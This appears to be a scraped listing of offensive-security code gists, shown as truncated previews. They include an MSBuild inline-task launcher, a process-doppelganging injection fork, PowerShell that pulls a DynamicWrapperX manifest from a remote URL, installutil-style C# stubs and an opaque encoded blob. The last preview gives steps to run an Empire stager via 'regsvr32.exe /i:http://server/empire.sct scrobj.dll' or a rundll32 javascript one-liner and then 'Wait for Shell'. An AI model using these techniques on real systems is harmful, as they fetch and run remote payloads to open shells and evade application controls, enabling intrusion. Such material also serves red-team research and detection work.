This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Start-DotNetEventCollection | |
{ | |
Param( | |
[Parameter(Position = 0)] | |
[Alias('PSPath')] | |
[String] $TracePath = './dotNetTrace.etl', | |
[Parameter(Position = 1)] | |
[String] $TraceName = 'dotNetTrace' | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
<Target Name="Hello"> | |
<ST > | |
</ST> | |
</Target> | |
<UsingTask | |
TaskName="ST" | |
TaskFactory="CodeTaskFactory" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// TheWover: Forked this. Note to self, make it do this: https://blog.malwarebytes.com/threat-analysis/2018/08/process-doppelganging-meets-process-hollowing_osiris/ | |
// | |
// Ref = src | |
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
// | |
// Credits: | |
// Vyacheslav Rusakov @swwwolf | |
// Tom Bonner @thomas_bonner | |
// |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// From: https://stackoverflow.com/questions/4997987/how-do-i-determine-if-a-process-is-managed-in-c | |
public bool IsCLRLoadedInProcess(Process mProcess) | |
} | |
foreach (ProcessModule pm in mProcess.Modules) | |
{ | |
if (pm.ModuleName.StartsWith("mscor", StringComparison.InvariantCultureIgnoreCase)) | |
{ | |
return true; | |
} | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Win32 & Kernel: | |
https://www.vergiliusproject.com/ | |
http://undocumented.ntinternals.net/ | |
https://www.geoffchappell.com/index.htm | |
Structs: | |
http://terminus.rewolf.pl/terminus/ | |
.NET: | |
https://referencesource.microsoft.com/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
7VlrbBzXdT53dmZ2+VqJS4nUg5RXz1CktF6KkijZkiOSu5Lo8iFpSTm0pVLD3RE50XJnNTMrae0qphI7jtDYjRLAiIMmhdO4iNu4Tds4cYu4jhvAgYoYqVv/cABXtX+0RWsEqYsacRLD7nfuDHeXFFurRf+0yCXn3HPPOffc87iv2Rm593MUIiIVzwcfED1HfjlEH17m8URv+/Mofavu5Y3PieGXN47PWm686NgzjjEXzxqFgu3Fp824UyrErUI8NZaJz9k5M9HUVL8l0HEsTTQsQvR9/ZevLuh9gzbFG0SSaB0auk+7ex9AvGLYSokrvt1UFfONUnw0RGceZlH+r9aVSpZ3+ojGAoefCy3j5BmiRrYTcvtuISaVAvsiNc0I2kdr2gnPvOSx3jWBX+uqdteoOJNwXCdLgW2wUTrcvlgO5EMJx8zbWd9Wtlnqit8kN7DUzO2BU0dlF41eR2K8GJG4FR+XKX9FnQhv/SfQX31fb0Bi3Ga0O6Gy3tsEvZ0twGDZCqLOVYx20fpkSJqMPs3UfZLIXQ1GPemK3QqkwQGjGH7M+uxW7t/GncKNN3r1HWHdXsOt15vI6YaMUmev5cHWySE+g5E61zNKN4jaWtTupyJdop39bKB4N4AsKu3aS5sgK1qSCm3zQ9dMoXrdMaCzEx3qdyrddUon6HpDd13ro10QbuimMOr1SZUeJZ5r6EOK3QFpewOb332fbt/G5lPYRiLqQ1JTY2THADnnoDgUeGJvRNWEGtGpf1XqblHrmtXWZvUxy94M4rZmtUW70V23I1wX+Eu6vYXN+vKNhpoo+Ia1aN3UrHVxPKWvB2jzlO+rQlGaKfk4233Gn05BzLey0YrzJExzt7Hd4VAnvNIb9UhrBJZ8hMfQW91ONvfG9haVnGch26z6MW9bNuZa91N1XWKlH+eePbTZj7NGD4Ki8did23lc3e6SQzo/5TTa3RzFHTI8zs84VguNsKCi6mwG7ITleufOGsF+UNs+ezsG8CmqM7Ig16h3JkDyHYFE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Make Sure dynwrapx,dll is in %temp% | |
$a = new-object -com Microsoft.Windows.ActCtx | |
$a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest' | |
$b = $a.CreateObject("DynamicWrapperX") | |
$b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null | |
$b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
//Add For PowerShell Invocation | |
using System.Collections.ObjectModel; | |
using System.Management.Automation; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Reflection; | |
using System.Reflection.Emit; | |
using System.Runtime; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
using System.EnterpriseServices; | |
using ComTypes = System.Runtime.InteropServices.ComTypes; | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Create Empire Listener | |
2. Generate Stager | |
3. Host Stager Code At Some URL | |
4. Host .sct File At Some URL | |
5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
-Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
7. Wait for Shell... |